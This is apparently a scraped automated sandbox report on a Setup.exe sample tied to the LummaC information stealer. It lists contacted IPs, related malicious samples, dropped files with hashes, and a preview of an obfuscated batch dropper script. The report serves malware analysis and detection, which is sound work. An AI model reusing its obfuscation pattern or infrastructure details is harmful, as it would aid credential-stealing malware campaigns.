                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Execution Graph export aborted for target BrightLib.exe, PID 5428 because there are no executed function
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1220 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:16:03 | API Interceptor | 1x Sleep call for process: Setup.exe modified
06:16:06 | API Interceptor | 11x Sleep call for process: M.com modified
06:16:54 | API Interceptor | 5x Sleep call for process: powershell.exe modified
06:17:46 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: DansMinistrie.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 9W9jJCj9EV.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: c2.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: RisingStrip.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):523463
                                                                                                                                                                                                                                                              Entropy (8bit):7.9996022821155925
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:XO85Bw8NKm6/tt3yxwtIxJGNFexzpeD2PQbMMRi2/YrgMrpUj1j6:e8uT/tt3yxwtIQF2Pq8NdrOjg
                                                                                                                                                                                                                                                              MD5:C968ADCBB493DC9D2A82F36EAA9E95F8
                                                                                                                                                                                                                                                              SHA1:282C85E77B6237ADDCF74A0B939FD16EFE84F502
                                                                                                                                                                                                                                                              SHA-256:892A47EDA407113D570628BE1967A42B3DAD57E69D6BFD0DF44A36EF630D74F3
                                                                                                                                                                                                                                                              SHA-512:028BA278B02C7CDD83314C46E05044F9E6F756B14749DA6380A69A3154F2D6689EA9433D83C5122CF79DE764BE211119ABFD7C385439A9FEEC4F4047628A3C3E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                              Entropy (8bit):5.960811901754456
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:Xe6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8a5:Xe6u640ewy4Za9coRC2jfTq8u
                                                                                                                                                                                                                                                              MD5:C0EF729745F6117C348BEDB0EB004ABE
                                                                                                                                                                                                                                                              SHA1:2031216F14E729CE341E8AD0D21C1D33A5C17E2A
                                                                                                                                                                                                                                                              SHA-256:7C9CC1AFF714E9FC46A16590BFD851DE16430C97AEE84C3753C6E8CD04CDD515
                                                                                                                                                                                                                                                              SHA-512:BA4B20471C72DE6C22AF3AACD7418ED506B13160ED32ED28B4E91A2199AD1137B3DF06D9221A3217490FF84D00AEEC03B70A488F5ACF22DD3D2FCB268606119E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (411), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9988
                                                                                                                                                                                                                                                              Entropy (8bit):5.202201082913625
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:wV2LGKHKra+EgJh6o0svRtSLzmqAmS1sjy6/zWiOzAyBPrY1rCQ:wV49HKrDEgJ4oTSHmJtoSiUVrwrf
                                                                                                                                                                                                                                                              MD5:A3B49AFF8C628F5084D67EEB9472CEDF
                                                                                                                                                                                                                                                              SHA1:5A5BB00725756F1D2D752FAE042EA1A485DA9BC9
                                                                                                                                                                                                                                                              SHA-256:D54359BA0F67574CB278765C01C8736CE30F7BA0C334EFD0257DE870A05400F1
                                                                                                                                                                                                                                                              SHA-512:E8E40D4DE1BD280E207F2A9AB9E081D5B93316E8BFC2A10D0BFF80EB255C1F5785BCD6FBE3A15E5ADB56F2C6806C199670B342055E3D539B0E06F5F2CB17ABF5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Jr=Z..wsTMassive-Confused-Kazakhstan-Heating-Grave-..HuwyInfluenced-Mls-Sticky-Boats-Runs-Document-Irc-Theater-..ziKOSent-Ericsson-Covers-Repository-Festivals-Slowly-..gsTwinks-..WxRelationship-Addition-..Set Blowjobs=i..WZFigures-Questions-Annually-Goods-Policy-Mail-Om-Myself-Cleveland-..eiIGApparently-Hottest-Surplus-..JaFestival-Blood-Furniture-..QZeHazards-Vegas-Around-Reject-Biodiversity-Unified-Ruling-Zoom-..enyGPhotographers-Theoretical-Harvey-Practical-Laura-..VkSMinus-Beat-Gardens-..qfLGFuel-Fiji-Blind-Blair-Transparent-..Set Cp=t..LyVehicle-Franchise-Corporation-Aids-Stopping-Securities-Expedia-Ambient-..mAgPerry-Textile-Henry-Worship-Pregnancy-Ya-Stored-Affecting-..nbhHRetailer-Labs-Occupations-..TyArchives-Jeep-Amd-Ambassador-Comprehensive-Pottery-..VhaBMatthew-Diagram-Climate-La-Rated-..LhQTimber-Resolve-..kADBInvention-Ozone-Classroom-Discusses-North-Heel-Gerald-..AdtyBras-Twins-Release-Before-Ambien-Namespace-..UnSubmit-Rs-..Set Ice=/..cCijRob-Frequency-Invention-Reu
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (411), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):9988
                                                                                                                                                                                                                                                              Entropy (8bit):5.202201082913625
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:wV2LGKHKra+EgJh6o0svRtSLzmqAmS1sjy6/zWiOzAyBPrY1rCQ:wV49HKrDEgJ4oTSHmJtoSiUVrwrf
                                                                                                                                                                                                                                                              MD5:A3B49AFF8C628F5084D67EEB9472CEDF
                                                                                                                                                                                                                                                              SHA1:5A5BB00725756F1D2D752FAE042EA1A485DA9BC9
                                                                                                                                                                                                                                                              SHA-256:D54359BA0F67574CB278765C01C8736CE30F7BA0C334EFD0257DE870A05400F1
                                                                                                                                                                                                                                                              SHA-512:E8E40D4DE1BD280E207F2A9AB9E081D5B93316E8BFC2A10D0BFF80EB255C1F5785BCD6FBE3A15E5ADB56F2C6806C199670B342055E3D539B0E06F5F2CB17ABF5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):135168
                                                                                                                                                                                                                                                              Entropy (8bit):6.702799339628459
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:EWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4CR:5f0accB3gBmmLsiS+SAhCR
                                                                                                                                                                                                                                                              MD5:63EEC4B702CBA3B241A629CA9B0966C7
                                                                                                                                                                                                                                                              SHA1:5FDCAF7666ADE1A5B65BA4204771A20045949C3C
                                                                                                                                                                                                                                                              SHA-256:E640DD754559BDED9648B416DA345766922BE9AD3442638AD4238F461E3742A8
                                                                                                                                                                                                                                                              SHA-512:6C172DCADB4F32428DF8B8C2C644946D69F4C4495B7D59A1F89C48B11830C39DF1DA4996D764899633A067D69A723429A2EDA3AEA02FB1E531002F517426DE6C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                              Entropy (8bit):5.162856156677674
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:PKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2k:H6whxjgarB/5elDWy4ZNk
                                                                                                                                                                                                                                                              MD5:DEB2EF5841C03C8199E3B62880855561
                                                                                                                                                                                                                                                              SHA1:2896E5E53C174EEF57068BD1C5D4EBE593D2FD26
                                                                                                                                                                                                                                                              SHA-256:4127B751377338E959EF9C806DACB750D3ADE4044312BD5D18FC88FCFCF71C49
                                                                                                                                                                                                                                                              SHA-512:D8B6B96B28003E9B3C264D816761EE2A21E901EE9680D24A09B106985ED35E642125FF240E3EB6474226FB6E9394A522069B650C300ECF21D17F64B460BB17F9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):81920
                                                                                                                                                                                                                                                              Entropy (8bit):7.9980874815792875
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:Lx4vE5aMZO37PQYmsF81YsHzyZj3HUZrbTouUoTZ3sA7tDY9egl:+saUOrPQnmbsHc7UEufZ3hteT
                                                                                                                                                                                                                                                              MD5:8146518F972046E4A3AB8B7AFED34F41
                                                                                                                                                                                                                                                              SHA1:E38256138D51DCC8651562EC46C099739965C94A
                                                                                                                                                                                                                                                              SHA-256:D0AB7DD5D449479E2A8B94FB02C793774A719EA76D8ABBE0E727320EBF1827DF
                                                                                                                                                                                                                                                              SHA-512:076DE92EC7307C1E587FED4E3053F4B61AEF21CCFEABBA17C0FA61F026F3FAE072DD3CE57A2E419BDC77836ED666AFC372228B30296EC14529CFB57271CECF64
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                              Entropy (8bit):7.996465240604242
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:mqWV4m6Lf8uDp5z4KySdFW0r8aGhx29a1u+wes5CcC:m3Otf8uDpekWoE29ads1C
                                                                                                                                                                                                                                                              MD5:CF5C8A28E5CB0E61ED033C3EA6EFAA7E
                                                                                                                                                                                                                                                              SHA1:95A5CE7B3CA88E5C8A2483AF9585B467AAC325DC
                                                                                                                                                                                                                                                              SHA-256:E7DAB9A1EF6FEF6EAF979908F89F879D1951F7941BAC2C5DEFA85B71BC28BA42
                                                                                                                                                                                                                                                              SHA-512:4CAB47F1CCE607018F3D4F97232C3442F7EB4786813ED008020237D6189101953363EFB1F29A9A36C0304DA834118A828E3BA623DB01DA94588268A2E1D0D8D6
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):48040
                                                                                                                                                                                                                                                              Entropy (8bit):7.051639397887468
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:39BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:39BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                              MD5:E10C4F74C953CF485827811AD726D7F7
                                                                                                                                                                                                                                                              SHA1:229733B8F94265DAB942D47A476FEC3DC5A0B4D6
                                                                                                                                                                                                                                                              SHA-256:E1242E544F51F0B3C5FBA0E4364325D07F9DAFD69A8CA2BDFF95BC9FA441938D
                                                                                                                                                                                                                                                              SHA-512:D3EC1E2B52CD58ED890D84005ADFF287FD0FF8FAD96981800FE4E0AEC4B9DBEB42E20BA2D550C34C3CCC6682F57188DA8537F03A36D453D73FBDB5C0563B3F23
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:Targa image data 16 x 16 x 16 +16 +16 "\020"
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):120832
                                                                                                                                                                                                                                                              Entropy (8bit):5.691312775542772
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:ZHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:ZLeAg0Fuz08XvBNbjaAtsPR
                                                                                                                                                                                                                                                              MD5:A99199AEC5BC87A1EE2F8C545403FC99
                                                                                                                                                                                                                                                              SHA1:96F6AF78FC4A1B3E7584D08CE6B37A509436BF4A
                                                                                                                                                                                                                                                              SHA-256:CB14578B039ED3E7474AF41D30AD0802E0CB2D14083E455742783B3AC0D40C1D
                                                                                                                                                                                                                                                              SHA-512:33858F6C9FE204AE42D4FC5062B80520234429C9B77481F7ED113E0065161D38BB89B68B3B03D7DA488465A24194BFB3C57AE2653F4F6B41DC7FCD46D06B6D72
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):71680
                                                                                                                                                                                                                                                              Entropy (8bit):7.996985850796443
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:Dzj2jmVu8VWhTmuXGP89dqjaExQjdDx0P/r1bdOTKwaqup:DuCVXSdIj8jw3JbEGoup
                                                                                                                                                                                                                                                              MD5:19A1CB04B353C4311062EBA6B3698DCA
                                                                                                                                                                                                                                                              SHA1:FA193375E64A1F0943C0C6101B4855CBA6AEBB06
                                                                                                                                                                                                                                                              SHA-256:794D207C1EF7E7496C18F1537CDD905C8770BA74DD37899E0E5D57E5BC263A02
                                                                                                                                                                                                                                                              SHA-512:8E2B94340B194CB80A85DB4289E008A45A42887627D9D729B87D3A3D14D286D41941EFEBCDC9CDB510BD757BD2988F51FCC302EB9786E87AED7C7E275A23A275
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):75776
                                                                                                                                                                                                                                                              Entropy (8bit):7.9977125434845275
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:Aqmc6FxQCbt62Wp/PKh7v1HWKL+VO1myp73iAyd9qzMZVvqX9X8Y:Aqmc6Uc827vsKqw1myp73iAW9qIMt8Y
                                                                                                                                                                                                                                                              MD5:22CD791ACE0898DD41C34F268CE1BD58
                                                                                                                                                                                                                                                              SHA1:8172A0BD78195B0771FCF47591F5C69A1D684038
                                                                                                                                                                                                                                                              SHA-256:E581D98106E4489D2EEE549ADA60B286C8EB16734EA6AFC85460CE7ED5EF8FA6
                                                                                                                                                                                                                                                              SHA-512:9542E2E8023CD5E6146E40215F016029A7E0996860D269284F615BD02CC491FE40FECE9D06B4F0B43B958E6104AF03BECBBF1AB4E17AE349D89EA7DA7129CB89
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                                                              Entropy (8bit):7.998082220994016
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:3iGJ6CzDBObnA3TTcG8xdJO4xamCEKgRAY1k1NhF6m0SilB08n7fgw5l55BC4H7b:3PzMbETTcGiJOgafElJ1k1L3hSC8rgMV
                                                                                                                                                                                                                                                              MD5:AE3D975D673229D2DA6CEC3AF9EE9732
                                                                                                                                                                                                                                                              SHA1:797E8261FA697D3FC874D26DA185F257B3B81D5E
                                                                                                                                                                                                                                                              SHA-256:68CEF50D6B6FA0AB188BC868F09322A76815473B3CAB69870DF192C82C88A39A
                                                                                                                                                                                                                                                              SHA-512:08790808E0825EFBAD01C8C2943FA76C740D869DE6B7C565964C732154311D0A17E1E6F16FA12F7C2BD68323D2D9D78A3756C1E0FA6078F4296EABD5D0835AF5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):45255
                                                                                                                                                                                                                                                              Entropy (8bit):7.996544831946577
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:768:PWDnoTjWWU3IPi3NVha+rq/uoa+eMJIzwOXd9VZByhI2raIV60OgJCgDNtTlbjA6:+SjWWiv9Vy27VzHHVoIBhgsQNjbK0
                                                                                                                                                                                                                                                              MD5:443721AB42DC4D5D15C8787F5A514E32
                                                                                                                                                                                                                                                              SHA1:97170DCA5C3F4424CA91713659934C2B172E440A
                                                                                                                                                                                                                                                              SHA-256:B8A42699C79C3217332DEBDBFA10C68756B768AD0BAD985CBE8B11C108D4EC58
                                                                                                                                                                                                                                                              SHA-512:87B31354964E9E6178D75D0C1B25C99CE422DEA783172FB971D4D69482D14DB6FFDFBA01E2C014228B9509CCF9D82B0E8A5B85FA542C2A800EF1A2AF864B63B3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                              Entropy (8bit):3.6847605455787105
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:TyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmvH:TyGS9PvCA433C+sCNC1skNkvQfhSH
                                                                                                                                                                                                                                                              MD5:BB88411A60DDC0157E8D40D1ED76CD79
                                                                                                                                                                                                                                                              SHA1:117982A5D6D309FB2854CE6C0640D29B75033538
                                                                                                                                                                                                                                                              SHA-256:2A2D98124D316800FE418BA09B228259080EE85D66BEAA46DEE67FEDF597620D
                                                                                                                                                                                                                                                              SHA-512:0A83AAE0CD0E5A793292B39A95E9232A2ACFF82E59A5DC294CBC4C5822BC302F61C463A7083A0B47EDE6DF74B3F1C9B021B1BFC3F514B08E36A20A67A6F6426E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):142336
                                                                                                                                                                                                                                                              Entropy (8bit):6.7126978121624745
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:o/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7td:o/sZ7HS3zcNPj0nEo3tb2jv
                                                                                                                                                                                                                                                              MD5:5042A594DA710E47600836FBC43D6AD4
                                                                                                                                                                                                                                                              SHA1:2DA77CA2E0B3688213130CDF716D15D708571F0B
                                                                                                                                                                                                                                                              SHA-256:169E9B982A79E12CCD7946B4BAEE1F4C87C820F404379BE690F01320C3D536E2
                                                                                                                                                                                                                                                              SHA-512:45D9E37D873AA17D6227F25A74908BD90716D5AC0C4AC636EE595C83750BF0631D1C154368BAB8931A875031600C440F68185C06365DE1212C7A612B3866FA57
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):152576
                                                                                                                                                                                                                                                              Entropy (8bit):6.5828820443058795
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:eT6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/J:SAUkB0CThp6vmVnjphfhnvO5bLezWWtB
                                                                                                                                                                                                                                                              MD5:837BF147B892CCED11D8599CE6DA2354
                                                                                                                                                                                                                                                              SHA1:C69307105A9A7888C39E351DF7B32BA1018F9C5F
                                                                                                                                                                                                                                                              SHA-256:9D93B4F03094FE65B6505E8245BAA7C9BBA085F7D81CAE74E6C98E4047CFD183
                                                                                                                                                                                                                                                              SHA-512:8AC87391D1862A17179BAD2DD75B169D30C2FEB796E05DD34819368CF3D5EEF42F4CB392AEAF910BC6580177D511B11376348AE5087BA473463CC36C2A81522C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):58368
                                                                                                                                                                                                                                                              Entropy (8bit):6.5922539876659005
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:nq0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu5:q0Imbi80PtCZEMnVIPPBxU
                                                                                                                                                                                                                                                              MD5:8E17BE931CE1809DA31A0F6D0B6D2E0D
                                                                                                                                                                                                                                                              SHA1:FACBF2933A2A37418FE111B1C52BD7E544814DD7
                                                                                                                                                                                                                                                              SHA-256:FCE2D1465A77CA597699578BF600BF962FC85DC09BDB68577BCE432D9B20E5B3
                                                                                                                                                                                                                                                              SHA-512:2CB8BCAC36BDE735BDF4D92DC813A749F1123A3DC44CFD3153C20F8C7E32F560FDD26D24761DBE15C0C2436A818CF1A42D427615206CD0BE5397EC9322DF2878
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):122880
                                                                                                                                                                                                                                                              Entropy (8bit):6.332790394280177
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:yZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDj:yK5vPeDkjGgQaE/loUDj
                                                                                                                                                                                                                                                              MD5:3BFDFC2C0298A9F87E726D34816A69CB
                                                                                                                                                                                                                                                              SHA1:3AA28889544312273E065763D5C84A44BD57CC6F
                                                                                                                                                                                                                                                              SHA-256:0A1AE6C240382136944F010A708AE95DF886A135FA46A08A269228B5C0D942BD
                                                                                                                                                                                                                                                              SHA-512:D72803247318BF39744BAEC8C5D1B4F6C6B2B8B5E7D94EA059A05457FFBFA18041AE6ACD02681A1C35FFBFA9305F44E15F12688084F2A1ACFDA3C48FB5142073
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 489455 bytes, 10 files, at 0x2c +A "Frank" +A "Re", ID 5566, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):489455
                                                                                                                                                                                                                                                              Entropy (8bit):7.99858200434768
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:TsroZ9yhYo53qf9MWr2RKSGwIs/eOOgguCb8tb9MedVP0WOjVHh5uj:TkoZ9Y3qf9MWrJwF/eOOghR4e3baxaj
                                                                                                                                                                                                                                                              MD5:B46FB35146A48B73DFD677FE6DE292A3
                                                                                                                                                                                                                                                              SHA1:0F5A70314A77DF29C9838B9A523F76FD84C352C1
                                                                                                                                                                                                                                                              SHA-256:088F9C381AFD7B2F220F8D7435B46ED382602BB4C29BB5009C448C8CCCF8B111
                                                                                                                                                                                                                                                              SHA-512:5B7C41DFE0F925FD0B4CAE040B4A01A11DA083251F49CB55B2D475366C575C2A7917A37B9CE54353573DFE01A6E02157E7E5425F687ADE5F4A4F56D1E09E3916
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):99328
                                                                                                                                                                                                                                                              Entropy (8bit):7.997987246841129
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:3072:aETPAswt6/YTUCBiS2S8/JZ4ZB/2GdN43:NPHwt6/nCQLJZ4/1dNw
                                                                                                                                                                                                                                                              MD5:4B02E727531966411D004BA983F04C56
                                                                                                                                                                                                                                                              SHA1:BE7A75ABA8C66AB7C3B20841E460A8D0DFF42E06
                                                                                                                                                                                                                                                              SHA-256:1D9A3B9E4277B27601BB2A0F75FE1232E5053E828AF698C909142B78FED1B474
